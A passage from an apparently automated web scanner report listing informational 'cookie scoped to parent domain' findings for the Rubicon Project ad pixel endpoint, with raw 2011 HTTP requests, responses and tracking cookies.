ses15=12338^3&12590^3; csi15=3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:31 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:15:31 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=1; expires=Wed, 07-Sep-2011 15:15:31 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^5&12590^5; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63868; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3151650.js^2^1315404889^1315404931&3188306.js^1^1315404900^1315404900&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; expires=Wed, 14-Sep-2011 14:15:31 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1733

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3151650"
...[SNIP]...

8.35. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=5328&nid=2025&put=f9bdca69-e609-4297-9145-48ea56a0756c&expires=730 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7856/12590
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rdk15=0; ses15=12338^2&12590^2; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%267935%3D14742%2C0%2C1%2C%2C; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; rdk=7725/12338; rdk2=0; ses2=12338^2

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%262874c0bb165b2b12e25b9caf%3D1%265328%3D1; expires=Fri, 07-Oct-2011 14:14:35 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%262874c0bb165b2b12e25b9caf%3D14742%2C0%2C1%2C%2C%265328%3D14742%2C0%2C1%2C%2C; expires=Fri, 07-Oct-2011 14:14:35 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; expires=Fri, 06-Sep-2013 14:14:35 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

8.36. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4210&nid=1523&put=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F&expires=10 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7725/12338
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=12338^1; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C0%2C1%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C; put_2081=OO-00000000000000000; rdk=7725/12338; rdk15=0; ses15=12338^2&12590^1; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1; expires=Fri, 07-Oct-2011 14:14:18 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C3%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C; expires=Fri, 07-Oct-2011 14:14:18 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; expires=Sat, 17-Sep-2011 14:14:18 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

8.37. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?expires=30&nid=2245&put=b6ae888c-d95b-11e0-b096-0025900e0834&v=7727 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7856/12590
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; ses15=12338^2&12590^2; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C1%2C%2C; put_2100=usr3fe3ac8db403a568; rdk=7856/12590; rdk2=0; ses2=12338^3&12590^1; csi2=3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; cd=false; au=GSAE3LG5-KKTN-10.208.77.156; lm="7 Sep 2011 14:14:35 GMT"

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%265852%3D1%267727%3D1; expires=Fri, 07-Oct-2011 14:15:00 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%267727%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C1%2C%2C%265852%3D14742%2C0%2C1%2C%2C; expires=Fri, 07-Oct-2011 14:15:00 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; expires=Fri, 07-Oct-2011 14:15:00 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

8.38. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4554&nid=1430&put=f0be7f74-7052-4a09-8aa0-ca59d82b3888&expires=180 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7725/12338
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1%266432%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C0%2C1%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=12338^1; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; csi15=3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; rdk=7856/12590; rdk15=0; ses15=12338^1&12590^1

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264554%3D1; expires=Fri, 07-Oct-2011 14:14:17 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C0%2C1%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C2%2C%2C%264554%3D14742%2C0%2C1%2C%2C; expires=Fri, 07-Oct-2011 14:14:17 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; expires=Mon, 05-Mar-2012 14:14:17 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

8.39. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=6286&nid=2132&put=439524AE8C6B634E021F5F7802166020&expires=365 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7856/12590
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=12338^1; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rdk=7856/12590; rdk15=0; ses15=12338^2&12590^2; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C; put_1185=2863298321806118365

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266286%3D1; expires=Fri, 07-Oct-2011 14:14:25 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266286%3D14742%2C0%2C1%2C%2C; expires=Fri, 07-Oct-2011 14:14:25 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2132=439524AE8C6B634E021F5F7802166020; expires=Thu, 06-Sep-2012 14:14:25 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

8.40. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=5852&nid=2101&put=f31d0c43-cd91-4caf-ae01-86754c3f8535 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://pixel.invitemedia.com/rubicon_sync?publisher_user_id=f772ba986ce1d14ae944dfcb2540fa9b434bfac6&publisher_dsp_id=2101&publisher_call_type=iframe&publisher_redirecturl=http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; rdk2=1; ses2=12338^3&12590^1; csi2=3151648.js^1^1315404875^1315404875&3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; rdk=7725/12338; rdk15=0; ses15=12338^3&12590^2; csi15=3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C1%2C%2C%267727%3D14742%2C0%2C1%2C%2C; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; cd=false; lm="7 Sep 2011 14:14:36 GMT"

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%262874c0bb165b2b12e25b9caf%3D1%262874c0bb2d7a602682976bca%3D1%2660732874c0bbd63f3fd660e8a1bd%3D1%266073%3D1%265852%3D1; expires=Fri, 07-Oct-2011 14:15:03 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%262874c0bb165b2b12e25b9caf%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C23%2C%2C%262874c0bb2d7a602682976bca%3D14742%2C0%2C1%2C%2C%2660732874c0bbd63f3fd660e8a1bd%3D14742%2C0%2C1%2C%2C%265852%3D14742%2C0%2C1%2C%2C; expires=Fri, 07-Oct-2011 14:15:03 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; expires=Fri, 07-Oct-2011 14:15:03 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

8.41. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=7935&nid=2271&expires=30&put=DUSYkUQpjy1LEYeYEnMS6srZRiE HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7856/12590
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=12338^1; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rdk=7856/12590; rdk15=0; ses15=12338^2&12590^2; 